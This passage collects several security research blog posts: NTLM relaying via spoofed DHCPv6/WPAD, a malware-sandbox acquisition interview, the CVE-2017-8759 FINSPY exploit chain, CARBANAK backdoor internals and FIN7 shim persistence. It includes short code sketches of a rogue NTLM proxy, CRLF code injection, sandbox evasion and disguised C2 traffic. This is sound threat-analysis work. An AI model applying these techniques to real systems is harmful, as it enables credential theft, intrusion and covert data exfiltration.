IE/Edge and Chrome (which uses IE's settings) will automatically authenticate to the proxy, even on the latest Windows versions. In Firefox this setting can be configured, but it is enabled by default.
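The 407-instead-of-401 behaviour described above can be sketched with Python's standard library. ntlmrelayx implements the full NTLM exchange and relaying; this toy handler only issues the initial challenge:

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

class RogueProxyHandler(BaseHTTPRequestHandler):
    """Minimal sketch: answer proxied requests with 407 + an NTLM challenge."""

    def _demand_auth(self):
        self.send_response(407, "Proxy Authentication Required")
        self.send_header("Proxy-Authenticate", "NTLM")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_GET(self):
        self._demand_auth()

    do_CONNECT = do_GET  # CONNECT requests get the same challenge

    def log_message(self, *args):  # keep the sketch quiet
        pass
```

Running this behind the spoofed WPAD entry would cause a proxy-aware client to receive the 407 and, per the behaviour described above, authenticate automatically.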


Windows will now happily send the NTLM challenge/response to the attacker, who can relay it to different services. With this relaying attack, the attacker can authenticate as the victim on services, access information on websites and shares, and if the victim has enough privileges, the attacker can even execute code on computers or even take over the entire Windows Domain. Some of the possibilities of NTLM relaying were explained in one of our previous blogs, which can be found here.

The full attack

The previous sections described the global idea behind the attack. Running the attack itself is quite straightforward. First we start mitm6, which will start replying to DHCPv6 requests and afterwards to DNS queries requesting names in the internal network. For the second part of our attack, we use our favorite relaying tool, ntlmrelayx. This tool is part of the impacket Python library by Core Security and is an improvement on the well-known smbrelayx tool, supporting several protocols to relay to. Core Security and Fox-IT recently worked together on improving ntlmrelayx, adding several new features which (among others) enable it to relay via IPv6, serve the WPAD file, automatically detect proxy requests and prompt the victim for the correct authentication. If you want to check out some of the new features, have a look at the relay-experimental branch.

To serve the WPAD file, all we need to add to the command is the -wh parameter, specifying the host that the WPAD file resides on. Since mitm6 gives us control over the DNS, any non-existing hostname in the victim network will do. To make sure ntlmrelayx listens on both IPv4 and IPv6, use the -6 parameter. The screenshots below show both tools in action, mitm6 selectively spoofing DNS replies and ntlmrelayx serving the WPAD file and then relaying authentication to other servers in the network.


Defenses and mitigations

The only defense against this attack that we are currently aware of is disabling IPv6 if it is not used on your internal network. This will stop Windows clients from querying for a DHCPv6 server and make it impossible to take over the DNS server via the method described above.
For the WPAD exploit, the best solution is to disable Proxy Auto-Detection via Group Policy. If your company uses a proxy configuration file internally (a PAC file), it is recommended to explicitly configure the PAC URL instead of relying on WPAD to detect it automatically.
While writing this blog, Google Project Zero also discovered vulnerabilities in WPAD; their blog post notes that, in their experience, disabling the WinHttpAutoProxySvc service is the only reliable way to disable WPAD.

Lastly, the only complete solution to prevent NTLM relaying is to disable it entirely and switch to Kerberos. If this is not possible, our last blog post on NTLM relaying mentions several mitigations to minimize the risk of relaying attacks.


The Fox-IT Security Research Team has released Snort and Suricata signatures to detect rogue DHCPv6 traffic and WPAD replies over IPv6:

Where to get the tools

mitm6 is available from the Fox-IT GitHub. The updated version of ntlmrelayx is available from the impacket repository.

Hybrid Analysis Grows Up – Acquired by CrowdStrike

CrowdStrike acquired Payload Security, the company behind the automated malware analysis sandbox technology Hybrid Analysis, in November 2017. Jan Miller founded Payload Security approximately 3 years earlier. The interview I conducted with Jan in early 2015 captured his mindset at the onset of the journey that led to this milestone. I briefly spoke with Jan again, a few days after the acquisition. He reflected upon his progress over the three years of leading Payload Security so far and his plans for Hybrid Analysis as part of CrowdStrike.

Jan, why did you and your team decide to join CrowdStrike?

Developing a malware analysis product requires a constant stream of improvements to the technology, not only to keep up with the pace of malware authors’ attempts to evade automated analysis but also innovate and embrace the community. The team has accomplished a lot thus far, but joining CrowdStrike gives us the ability to access a lot more resources and grow the team to rapidly improve Hybrid Analysis in the competitive space that we live in. We will have the ability to bring more people into the team and also enhance and grow the infrastructure and integrations behind the free Hybrid Analysis community platform.

What role did the free version of your product, available at, play in the company’s evolution?

A lot of people in the community have been using the free version of Hybrid Analysis to analyze their own malware samples, share them with friends, or look up existing analysis reports and extract intelligence. Today, the site has approximately 44,000 active users and around 1 million sessions per month. One of the reasons the site took off is the simplicity and quality of the reports, which focus on what matters and enable effective incident response.

The success of Hybrid Analysis was, to a large extent, due to the engagement from the community. The samples we have been receiving allowed us to constantly field-test the system against the latest malware, stay on top of the game and also to embrace feedback from security professionals. This allowed us to keep improving at rapid pace in a competitive space, successfully.

What will happen to the free version of Hybrid Analysis? I saw on Twitter that your team pinky-promised to continue making it available for free to the community, but I was hoping you could comment further on this.

I’m personally committed to ensuring that the community platform will stay not only free, but grow even more useful and offer new capabilities shortly. Hybrid Analysis deserves to be the place for professionals to get a reasoned opinion about any binary they’ve encountered. We plan to open up the API, add more integrations and other free capabilities in the near future.

What stands out in your mind as you reflect upon your Hybrid Analysis journey so far? What’s motivating you to move forward?

Starting out without any noteworthy funding, co-founders or advisors, in a saturated high-tech market that is extremely fast-paced and full of money, it seemed impossible to succeed on paper. But the reality is: if you are offering a product or service that solves a real-world problem considerably better than the market leaders, you always have a chance. My hope is that people who are considering becoming entrepreneurs will be encouraged to pursue their ideas. Be prepared to work 80 hours a week, but with the right technology, feedback from the community, amazing team members, and insightful advisors, you can make it happen.

In fact, it’s because of the value Hybrid Analysis has been adding to the community that I was able to attract the highly talented individuals that are currently on the team. It has always been important for me to make a difference, to contribute something and have a true impact on people’s lives. It all boils down to bringing more light than darkness into the world, as cheesy as that might sound.

FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY

FireEye recently detected a malicious Microsoft Office RTF document that leveraged CVE-2017-8759, a SOAP WSDL parser code injection vulnerability. This vulnerability allows a malicious actor to inject arbitrary code during the parsing of SOAP WSDL definition contents. FireEye analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands.

FireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch to address the vulnerability and security guidance, which can be found here.

FireEye email, endpoint and network products detected the malicious documents.

Vulnerability Used to Target Russian Speakers

The malicious document, “Проект.doc” (MD5: fe5c4d6bb78e170abf5cf3741868ea4c), might have been used to target a Russian speaker. Upon successful exploitation of CVE-2017-8759, the document downloads multiple components (details follow), and eventually launches a FINSPY payload (MD5: a7b990d5f57b244dd17e9a937a41e7f5).

FINSPY malware, also reported as FinFisher or WingBird, is available for purchase as part of a “lawful intercept” capability. Based on this and previous use of FINSPY, we assess with moderate confidence that this malicious document was used by a nation-state to target a Russian-speaking entity for cyber espionage purposes. Additional detections by FireEye's Dynamic Threat Intelligence system indicate that related activity, though potentially for a different client, might have occurred as early as July 2017.

CVE-2017-8759 WSDL Parser Code Injection

A code injection vulnerability exists in the WSDL parser module, within the PrintClientProxy method (System.Runtime.Remoting/metadata/wsdlparser.cs, 6111). The IsValidUrl method does not perform correct validation when provided data that contains a CRLF sequence. This allows an attacker to inject and execute arbitrary code. A portion of the vulnerable code is shown in Figure 1.

Figure 1: Vulnerable WSDL Parser

When multiple address definitions are provided in a SOAP response, the code inserts the “//base.ConfigureProxy(this.GetType(),” string after the first address, commenting out the remaining addresses. However, if a CRLF sequence is present in the additional addresses, the code following the CRLF will not be commented out. Figure 2 shows that, due to the lack of CRLF validation, a System.Diagnostics.Process.Start method call is injected. The generated code is compiled by csc.exe of the .NET Framework, then loaded by the Office executables as a DLL.
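To see why the missing CRLF validation matters, the comment-out logic can be simulated in a few lines of Python. This is a simplified model of the generated C# for illustration, not the actual .NET parser code:

```python
def generate_proxy_source(addresses):
    """Model of the codegen: the first address is used, extras get '//' comments."""
    lines = [f'this.Url = "{addresses[0]}";']
    for extra in addresses[1:]:
        # The real generator emits the extra addresses commented out, but the
        # '//' prefix only covers one line. A CRLF inside `extra` starts a new
        # line that is NOT commented out, so attacker code survives compilation.
        lines.append(f'// this.Url = "{extra}";')
    return "\n".join(lines)

malicious = generate_proxy_source([
    "http://a",
    'http://b";\r\nSystem.Diagnostics.Process.Start("calc.exe");//',
])
```

In the `malicious` output, the injected `System.Diagnostics.Process.Start` call lands at the start of a fresh line, outside any comment.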

Figure 2: SOAP definition VS Generated code

The In-the-Wild Attacks

The attacks that FireEye observed in the wild leveraged a Rich Text Format (RTF) document, similar to the CVE-2017-0199 documents we previously reported on. The malicious sample contained an embedded SOAP moniker to facilitate exploitation (Figure 3).

Figure 3: SOAP Moniker

The payload retrieves the malicious SOAP WSDL definition from an attacker-controlled server. The WSDL parser, implemented in the .NET Framework, parses the content and generates .cs source code in the working directory. The csc.exe of the .NET Framework then compiles the generated source code into a library, namely http[url path].dll. Microsoft Office then loads the library, completing the exploitation stage. Figure 4 shows an example library loaded as a result of exploitation.

Figure 4: DLL loaded

Upon successful exploitation, the injected code creates a new process and leverages mshta.exe to retrieve an HTA script named “word.db” from the same server. The HTA script removes the source code, compiled DLL and the PDB files from disk, then downloads and executes the FINSPY malware named “left.jpg,” which in spite of the .jpg extension and “image/jpeg” content-type is actually an executable. Figure 5 shows the details of the PCAP of this malware transfer.

Figure 5: Live requests

The malware will be placed at %appdata%\Microsoft\Windows\OfficeUpdte-KB[ 6 random numbers ].exe. Figure 6 shows the process create chain under Process Monitor.

Figure 6: Process Created Chain

The Malware

The “left.jpg” (md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant of FINSPY. It leverages heavily obfuscated code that employs a built-in virtual machine – among other anti-analysis techniques – to make reversing more difficult. As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames. This variant runs with a mutex of "WininetStartupMutex0".
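The MD5-filename check described above can be sketched as follows. This is a re-implementation of the idea for illustration, not FINSPY's actual code:

```python
import hashlib
from pathlib import Path

def looks_like_renamed_sample(path: str) -> bool:
    """Return True if the file's own name equals the MD5 of its contents.

    Sandboxes and analysis pipelines often rename samples to their MD5 hash,
    so a match is a hint that the binary is running under analysis.
    """
    p = Path(path)
    digest = hashlib.md5(p.read_bytes()).hexdigest()
    return p.stem.lower() == digest
```

Malware using this trick would simply exit, or change behaviour, when the check returns True.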


CVE-2017-8759 is the second zero-day vulnerability used to distribute FINSPY uncovered by FireEye in 2017. These exposures demonstrate the significant resources available to “lawful intercept” companies and their customers. Furthermore, FINSPY has been sold to multiple clients, suggesting the vulnerability was being used against other targets.

It is possible that CVE-2017-8759 was being used by additional actors. While we have not found evidence of this, the zero-day used to distribute FINSPY in April 2017, CVE-2017-0199, was simultaneously being used by a financially motivated actor. If the actors behind FINSPY obtained this vulnerability from the same source used previously, it is possible that the source sold it to additional actors.


Thank you to Dhanesh Kizhakkinan, Joseph Reyes, FireEye Labs Team, FireEye FLARE Team and FireEye iSIGHT Intelligence for their contributions to this blog. We also thank everyone from the Microsoft Security Response Center (MSRC) who worked with us on this issue.

Behind the CARBANAK Backdoor

In this blog, we will take a closer look at the powerful, versatile backdoor known as CARBANAK (aka Anunak). Specifically, we will focus on the operational details of its use over the past few years, including its configuration, the minor variations observed from sample to sample, and its evolution. With these details, we will then draw some conclusions about the operators of CARBANAK. For some additional background on the CARBANAK backdoor, see the papers by Kaspersky, Group-IB, and Fox-IT.

Technical Analysis

Before we dive into the meat of this blog, a brief technical analysis of the backdoor is necessary to provide some context. CARBANAK is a full-featured backdoor with data-stealing capabilities and a plugin architecture. Some of its capabilities include key logging, desktop video capture, VNC, HTTP form grabbing, file system management, file transfer, TCP tunneling, HTTP proxy, OS destruction, POS and Outlook data theft and reverse shell. Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time.

Monitoring Threads

The backdoor may optionally start one or more threads that perform continuous monitoring for various purposes, as described in Table 1.  

Thread Name: Description

Key logger: Logs key strokes for configured processes and sends them to the command and control (C2) server

Form grabber: Monitors HTTP traffic for form data and sends it to the C2 server

POS monitor: Monitors for changes to logs stored in C:\NSB\Coalition\Logs and nsb.pos.client.log and sends parsed data to the C2 server

PST monitor: Searches recursively for newly created Outlook personal storage table (PST) files within user directories and sends them to the C2 server

HTTP proxy monitor: Monitors HTTP traffic for requests sent to HTTP proxies and saves the proxy address and credentials for future use

Table 1: Monitoring threads


In addition to its file management capabilities, this data-stealing backdoor supports 34 commands that can be received from the C2 server. After decryption, these 34 commands are plain text with parameters that are space delimited much like a command line. The command and parameter names are hashed before being compared by the binary, making it difficult to recover the original names of commands and parameters. Table 2 lists these commands.

Runs each command specified in the configuration file (see the Configuration section)
Updates the state value (see the Configuration section)
Desktop video recording
Downloads executable and injects it into a new process
Ammyy Admin tool
Updates self
Add/Update klgconfig (analysis incomplete)
Starts HTTP proxy
Renders computer unbootable by wiping the MBR
Reboots the operating system
Creates a network tunnel
Adds new C2 server or proxy address for pseudo-HTTP protocol
Adds new C2 server for custom binary protocol
Creates or deletes Windows user account
Enables concurrent RDP (analysis incomplete)
Adds Notification Package (analysis incomplete)
Deletes file or service
Adds command to the configuration file (see the Configuration section)
Downloads executable and injects it directly into a new process
Sends Windows account details to the C2 server
Takes a screenshot of the desktop and sends it to the C2 server
Backdoor sleeps until specified date
Uploads files to the C2 server
Runs VNC plugin
Runs specified executable file
Uninstalls backdoor
Returns list of running processes to the C2 server
Changes C2 protocol used by plugins
Downloads and executes shellcode from specified address
Terminates the first process found with the specified name
Initiates a reverse shell to the C2 server
Plugin control
Updates backdoor

Table 2: Supported Commands


A configuration file resides in a file under the backdoor’s installation directory with the .bin extension. It contains commands in the same form as those listed in Table 2 that are automatically executed by the backdoor when it is started. These commands are also executed when the loadconfig command is issued. This file can be likened to a startup script for the backdoor. The state command sets a global variable containing a series of Boolean values represented as ASCII values ‘0’ or ‘1’ and also adds itself to the configuration file. Some of these values indicate which C2 protocol to use, whether the backdoor has been installed, and whether the PST monitoring thread is running or not. Other than the state command, all commands in the configuration file are identified by their hash’s decimal value instead of their plain text name. Certain commands, when executed, add themselves to the configuration so they will persist across (or be part of) reboots. The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it.

Figure 1 and Figure 2 illustrate some sample, decoded configuration files we have come across in our investigations.

Figure 1: Configuration file that adds new C2 server and forces the data-stealing backdoor to use it

Figure 2: Configuration file that adds TCP tunnels and records desktop video

Command and Control

CARBANAK communicates to its C2 servers via pseudo-HTTP or a custom binary protocol.

Pseudo-HTTP Protocol

Messages for the pseudo-HTTP protocol are delimited with the ‘|’ character. A message starts with a host ID composed by concatenating a hash value generated from the computer’s hostname and MAC address to a string likely used as a campaign code. Once the message has been formatted, it is sandwiched between an additional two fields of randomly generated strings of upper and lower case alphabet characters. An example of a command polling message and a response to the listprocess command are given in Figure 3 and Figure 4, respectively.
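Putting that layout together, a polling message can be sketched as below. The actual hash algorithm CARBANAK applies to the hostname and MAC address is not reproduced here; CRC32 stands in purely as a placeholder, and the field sizes are illustrative:

```python
import random
import string
import zlib

def random_alpha(n: int) -> str:
    """Random upper/lower-case alphabetic padding, as described above."""
    return "".join(random.choice(string.ascii_letters) for _ in range(n))

def build_polling_message(hostname: str, mac: str, campaign: str) -> str:
    # Host ID: a hash of hostname + MAC, concatenated with the campaign code.
    # (CRC32 is a stand-in; the real hash function differs.)
    host_id = f"{zlib.crc32((hostname + mac).encode()):08x}{campaign}"
    # Fields are '|'-delimited, sandwiched between two random alphabetic strings.
    return "|".join([random_alpha(8), host_id, random_alpha(8)])
```

The resulting string would then be encrypted and encoded as described in the following paragraphs before being placed in a request.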

Figure 3: Example command polling message

Figure 4: Example command response message

Messages are encrypted using Microsoft’s implementation of RC2 in CBC mode with PKCS#5 padding. The encrypted message is then Base64 encoded, replacing all the ‘/’ and ‘+’ characters with the ‘.’ and ‘-’ characters, respectively. The eight-byte initialization vector (IV) is a randomly generated string consisting of upper and lower case alphabet characters. It is prepended to the encrypted and encoded message.

The encoded payload is then made to look like a URI by having a random number of ‘/’ characters inserted at random locations within the encoded payload. The malware then appends a script extension (php, bml, or cgi) with a random number of random parameters or a file extension from the following list with no parameters: gif, jpg, png, htm, html, php.
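The encode-and-disguise steps can be sketched as follows. RC2 encryption and the prepended IV are omitted; this models only the Base64 character substitution, the random slash insertion, and the appended extension:

```python
import base64
import random

def disguise_payload(ciphertext: bytes) -> str:
    """Turn an (already encrypted) payload into a benign-looking URI path."""
    encoded = base64.b64encode(ciphertext).decode()
    # Substitute the Base64 '/' and '+' characters with '.' and '-'.
    encoded = encoded.replace("/", ".").replace("+", "-")
    # Insert a random number of '/' characters at random positions.
    chars = list(encoded)
    for _ in range(random.randint(2, 6)):
        chars.insert(random.randrange(1, len(chars)), "/")
    # Append a file extension from the list mentioned above.
    extension = random.choice(["gif", "jpg", "png", "htm", "html", "php"])
    return "/" + "".join(chars) + "." + extension
```

Reversing the substitutions and stripping the inserted slashes recovers the original Base64 payload, which is what the C2 server would do on receipt.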

This URI is then used in a GET or POST request. The body of the POST request may contain files contained in the cabinet format. A sample GET request is shown in Figure 5.

Figure 5: Sample pseudo-HTTP beacon

The pseudo-HTTP protocol uses any proxies discovered by the HTTP proxy monitoring thread or added by the adminka command. The backdoor also searches for proxy configurations to use in the registry at HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings and for each profile in the Mozilla Firefox configuration file at %AppData%\Mozilla\Firefox\<ProfileName>\prefs.js.

Custom Binary Protocol

Figure 6 describes the structure of the malware’s custom binary protocol. If a message is larger than 150 bytes, it is compressed with an unidentified algorithm. If a message is larger than 4096 bytes, it is broken into compressed chunks. This protocol has undergone several changes over the years, each version building upon the previous version in some way. These changes were likely introduced to render existing network signatures ineffective and to make signature creation more difficult.

Figure 6: Binary protocol message format

Version 1

In the earliest version of the binary protocol we have discovered, the message bodies stored in the <chunkData> field are simply XORed with the host ID. The initial message is not encrypted and contains the host ID.
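Version 1's obfuscation is a plain repeating-key XOR, which can be expressed in a couple of lines (an illustrative sketch of the scheme, not CARBANAK's code):

```python
from itertools import cycle

def xor_with_host_id(data: bytes, host_id: bytes) -> bytes:
    # Repeating-key XOR: byte i of the body is XORed with byte
    # (i mod len(host_id)) of the host ID. Applying it twice round-trips.
    return bytes(b ^ k for b, k in zip(data, cycle(host_id)))
```

Because the key (the host ID) is sent in the clear in the initial message, this version offers obfuscation rather than real confidentiality, which the later versions progressively address.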

Version 2

Rather than using the host ID as the key, this version uses a random XOR key between 32 and 64 bytes in length that is generated for each session. This key is sent in the initial message.

Version 3

Version 3 adds encryption to the headers. The first 19 bytes of the message headers (up to the <hdrXORKey2> field) are XORed with a five-byte key that is randomly generated per message and stored in the <hdrXORKey2> field. If the <flag> field of the message header is greater than one, the XOR key used to encrypt message bodies is iterated in reverse when encrypting and decrypting messages.

Version 4

This version adds a bit more complexity to the header encryption scheme. The headers are XOR encrypted with <hdrXORKey1> and <hdrXORKey2> combined and reversed.

Version 5

Version 5 is the most sophisticated of the binary protocols we have seen. A 256-bit AES session key is generated and used to encrypt both message headers and bodies separately. Initially, the key is sent to the C2 server with the entire message and headers encrypted with the RSA key exchange algorithm. All subsequent messages are encrypted with AES in CBC mode. The use of public key cryptography makes decryption of the session key infeasible without the C2 server’s private key.

The Roundup

We have rounded up 220 samples of the CARBANAK backdoor and compiled a table that highlights some interesting details that we were able to extract. It should be noted that in most of these cases the backdoor was embedded as a packed payload in another executable or in a weaponized document file of some kind. The MD5 hash is for the original executable file that eventually launches CARBANAK, but the details of each sample were extracted from memory during execution. This data provides us with a unique insight into the operational aspect of CARBANAK and can be downloaded here.

Protocol Evolution

As described earlier, CARBANAK’s binary protocol has undergone several significant changes over the years. Figure 7 illustrates a rough timeline of this evolution based on the compile times of samples we have in our collection. This may not be entirely accurate because our visibility is not complete, but it gives us a general idea as to when the changes occurred. It has been observed that some builds of this data-stealing backdoor use outdated versions of the protocol. This may suggest multiple groups of operators compiling their own builds of this data-stealing backdoor independently.

Figure 7: Timeline of binary protocol versions

*It is likely that we are missing an earlier build that utilized version 3.

Build Tool

Most of CARBANAK’s strings are encrypted in order to make analysis more difficult. We have observed that the key and the cipher texts for all the encrypted strings are changed for each sample that we have encountered, even amongst samples with the same compile time. The RC2 key used for the HTTP protocol has also been observed to change among samples with the same compile time. These observations paired with the use of campaign codes that must be configured denote the likely existence of a build tool.

Rapid Builds

Despite the likelihood of a build tool, we have found 57 unique compile times in our sample set, with some of the compile times being quite close in proximity. For example, on May 20, 2014, two builds were compiled approximately four hours apart and were configured to use the same C2 servers. Again, on July 30, 2015, two builds were compiled approximately 12 hours apart.

What changes in the code can we see in such short time intervals that would not be present in a build tool? In one case, one build was programmed to execute the runmem command for a file named wi.exe while the other was not. This command downloads an executable from the C2 and directly runs it in memory. In another case, one build was programmed to check for the existence of the domain in the trusted sites list for Internet Explorer while the other was not. Blizko is an online money transfer service. We have also seen that different monitoring threads from Table 1 are enabled from build to build. These minor changes suggest that the code is quickly modified and compiled to adapt to the needs of the operator for particular targets.

Campaign Code and Compile Time Correlation

In some cases, there is a close proximity of the compile time of a CARBANAK sample to the month specified in a particular campaign code. Figure 8 shows some of the relationships that can be observed in our data set.

Figure 8: Campaign code to compile time relationships

Recent Updates

Recently, 64 bit variants of the backdoor have been discovered. We shared details about such variants in a recent blog post. Some of these variants are programmed to sleep until a configured activation date when they will become active.


The “Carbanak Group”

Much of the publicly released reporting surrounding the CARBANAK malware refers to a corresponding “Carbanak Group,” which appears to be behind the malicious activity associated with this data-stealing backdoor. FireEye iSIGHT Intelligence has tracked several separate overarching campaigns employing the CARBANAK tool and other associated backdoors, such as DRIFTPIN (aka Toshliph). With the data available at this time, it is unclear how interconnected these campaigns are – if they are all directly orchestrated by the same criminal group, or if these campaigns were perpetrated by loosely affiliated actors sharing malware and techniques.


In all Mandiant investigations to date where the CARBANAK backdoor has been discovered, the activity has been attributed to the FIN7 threat group. FIN7 has been extremely active against the U.S. restaurant and hospitality industries since mid-2015.

FIN7 uses CARBANAK as a post-exploitation tool in later phases of an intrusion to cement their foothold in a network and maintain access, frequently using the video command to monitor users and learn about the victim network, as well as the tunnel command to proxy connections into isolated portions of the victim environment. FIN7 has consistently utilized legally purchased code signing certificates to sign their CARBANAK payloads. Finally, FIN7 has leveraged several new techniques that we have not observed in other CARBANAK related activity.

We have covered recent FIN7 activity in previous public blog posts.

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on our investigations and observations into FIN7 activity.

Widespread Bank Targeting Throughout the U.S., Middle East and Asia

Proofpoint initially reported on a widespread campaign targeting banks and financial organizations throughout the U.S. and Middle East in early 2016. We identified several additional organizations in these regions, as well as in Southeast Asia and Southwest Asia being targeted by the same attackers.

This cluster of activity persisted from late 2014 into early 2016. Most notably, the infrastructure utilized in this campaign overlapped with LAZIOK, NETWIRE and other malware targeting similar financial entities in these regions.


DRIFTPIN (aka Spy.Agent.ORM, and Toshliph) has been previously associated with CARBANAK in various campaigns. We have seen it deployed in initial spear phishing by FIN7 in the first half of 2016.  Also, in late 2015, ESET reported on CARBANAK associated attacks, detailing a spear phishing campaign targeting Russian and Eastern European banks using DRIFTPIN as the malicious payload. Cyphort Labs also revealed that variants of DRIFTPIN associated with this cluster of activity had been deployed via the RIG exploit kit placed on two compromised Ukrainian banks’ websites.

FireEye iSIGHT Intelligence observed this wave of spear phishing aimed at a large array of targets, including U.S. financial institutions and companies associated with Bitcoin trading and mining activities. This cluster of activity remains active to this day, targeting similar entities. Additional details on this latest activity are available on the FireEye iSIGHT Intelligence MySIGHT Portal.

Earlier CARBANAK Activity

In December 2014, Group-IB and Fox-IT released a report about an organized criminal group using malware called "Anunak" that has targeted Eastern European banks, U.S. and European point-of-sale systems and other entities. Kaspersky released a similar report about the same group under the name "Carbanak" in February 2015. The name “Carbanak” was coined by Kaspersky in this report – the malware authors refer to the backdoor as Anunak.

This activity was further linked to the 2014 exploitation of ATMs in Ukraine. Additionally, some of this early activity shares a similarity with current FIN7 operations – the use of Power Admin PAExec for lateral movement.


The details that can be extracted from CARBANAK samples provide unique insight into the operational details behind this data-stealing malware. Several inferences can be made from looking at such data in bulk, as discussed above, and they are summarized as follows:

  1. Based upon the information we have observed, we believe that at least some of the operators of CARBANAK either have direct access to the source code and the knowledge to modify it, or have a close relationship with the developer(s).
  2. Some of the operators may be compiling their own builds of the backdoor independently.
  3. A build tool is likely being used by these attackers that allows the operator to configure details such as C2 addresses, C2 encryption keys, and a campaign code. This build tool encrypts the binary’s strings with a fresh key for each build.
  4. Varying campaign codes indicate that independent or loosely affiliated criminal actors are employing CARBANAK in a wide range of intrusions that target a variety of industries but are especially directed at financial institutions across the globe, as well as the restaurant and hospitality sectors within the U.S.
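The string handling described in point 3 can be illustrated with a toy sketch (our own simplification, not CARBANAK's actual cipher): each build encrypts the same embedded strings under a freshly generated key, so identical source strings produce different bytes in every binary.

```python
import os

def xor_encrypt(data: bytes, key: bytes) -> bytes:
    """Toy repeating-key XOR standing in for the real string cipher."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

strings = [b"campaign_code", b"c2.example.net"]  # illustrative plaintexts

# Two "builds" from the same source, each with a fresh random key.
key_a, key_b = os.urandom(8), os.urandom(8)
build_a = [xor_encrypt(s, key_a) for s in strings]
build_b = [xor_encrypt(s, key_b) for s in strings]

# XOR is its own inverse, so each build decrypts with its own key.
assert [xor_encrypt(c, key_a) for c in build_a] == strings
assert [xor_encrypt(c, key_b) for c in build_b] == strings
```

With overwhelming probability the two builds' ciphertexts differ even though the plaintexts are identical, which is consistent with the fresh-key-per-build behavior inferred above.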

To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence

In 2017, Mandiant responded to multiple incidents we attribute to FIN7, a financially motivated threat group associated with malicious operations dating back to 2015. Throughout the various environments, FIN7 leveraged the CARBANAK backdoor, which this group has used in previous operations.

A unique aspect of the incidents was how the group installed the CARBANAK backdoor for persistent access. Mandiant identified that the group leveraged an application shim database to achieve persistence on systems in multiple environments. The shim injected a malicious in-memory patch into the Services Control Manager (“services.exe”) process, and then spawned a CARBANAK backdoor process.

Mandiant identified that FIN7 also used this technique to install a payment card harvesting utility for persistent access. This was a departure from FIN7’s previous approach of installing a malicious Windows service for process injection and persistent access.

Application Compatibility Shims Background

According to Microsoft, an application compatibility shim is a small library that transparently intercepts an API (via hooking), changes the parameters passed, handles the operation itself, or redirects the operation elsewhere, such as additional code stored on a system. Today, shims are mainly used for compatibility purposes for legacy applications. While shims serve a legitimate purpose, they can also be used in a malicious manner. Mandiant consultants previously discussed shim databases at both BruCon and BlackHat.

Shim Database Registration

There are multiple ways to register a shim database on a system. One technique is to use the built-in “sdbinst.exe” command line tool. Figure 1 displays the two registry keys created when a shim is registered with the “sdbinst.exe” utility.

Figure 1: Shim database registry keys

Once a shim database has been registered on a system, the shim database file (“.sdb” file extension) will be copied to the “C:\Windows\AppPatch\Custom” directory for 32-bit shims or “C:\Windows\AppPatch\Custom\Custom64” directory for 64-bit shims.

Malicious Shim Database Installation

To install and register the malicious shim database on a system, FIN7 used a custom Base64 encoded PowerShell script, which ran the “sdbinst.exe” utility to register a custom shim database file containing a patch onto a system. Figure 2 provides a decoded excerpt from a recovered FIN7 PowerShell script showing the parameters for this command.

Figure 2: Excerpt from a FIN7 PowerShell script to install a custom shim
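To illustrate the decoding step: when a Base64-encoded command is passed to PowerShell via its -EncodedCommand parameter, the payload is Base64 over UTF-16LE text. A minimal decoder, using a hypothetical benign command rather than FIN7's actual script, might look like:

```python
import base64

def decode_encoded_command(b64: str) -> str:
    # PowerShell's -EncodedCommand expects Base64 of UTF-16LE text.
    return base64.b64decode(b64).decode("utf-16-le")

# Hypothetical example command, for illustration only.
cmd = 'sdbinst.exe -q "C:\\Windows\\Temp\\example.sdb"'
encoded = base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")
assert decode_encoded_command(encoded) == cmd
```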

FIN7 used various naming conventions for the shim database files that were installed and registered on systems with the “sdbinst.exe” utility. A common observance was the creation of a shim database file with a “.tmp” file extension (Figure 3).

Figure 3: Malicious shim database example

Upon registering the custom shim database on a system, a file named with a random GUID and an “.sdb” extension was written to the 64-bit shim database default directory, as shown in Figure 4. The registered shim database file had the same MD5 hash as the file that was initially created in the “C:\Windows\Temp” directory.

Figure 4: Shim database after registration

In addition, specific registry keys were created that correlated to the shim database registration.  Figure 5 shows the keys and values related to this shim installation.

Figure 5: Shim database registry keys

The database description used for the shim database registration, “Microsoft KB2832077”, was interesting because this KB number does not correspond to a published Microsoft Knowledge Base patch. This description (shown in Figure 6) appeared in the listing of installed programs within the Windows Control Panel on the compromised system.

Figure 6: Shim database as an installed application

Malicious Shim Database Details

During the investigations, Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of “services.exe” with their CARBANAK payload. This occurred when the “services.exe” process executed at startup. The shim database file contained shellcode for a first stage loader that obtained an additional shellcode payload stored in a registry key. The second stage shellcode launched the CARBANAK DLL (stored in a registry key), which spawned an instance of Service Host (“svchost.exe”) and injected itself into that process.  

Figure 7 shows a parsed shim database file that was leveraged by FIN7.

Figure 7: Parsed shim database file

For the first stage loader, the patch overwrote the “ScRegisterTCPEndpoint” function at relative virtual address (RVA) “0x0001407c” within the services.exe process with the malicious shellcode from the shim database file. 
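Since an RVA is an offset from the module's load address, the virtual address of the patched function is simply base plus RVA. A trivial sketch (the base address in the example is hypothetical):

```python
SC_REGISTER_TCP_ENDPOINT_RVA = 0x0001407C  # RVA patched by the shim

def patched_va(image_base: int, rva: int = SC_REGISTER_TCP_ENDPOINT_RVA) -> int:
    """Virtual address of the patched function for a given load address."""
    return image_base + rva

# Example with a hypothetical (non-ASLR) base address for services.exe.
print(hex(patched_va(0x00400000)))  # 0x41407c
```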

The new “ScRegisterTCPEndpoint” function (shellcode) contained a reference to the path of “\REGISTRY\MACHINE\SOFTWARE\Microsoft\DRM”, which is a registry location where additional malicious shellcode and the CARBANAK DLL payload was stored on the system.

Figure 8 provides an excerpt of the parsed patch structure within the recovered shim database file.

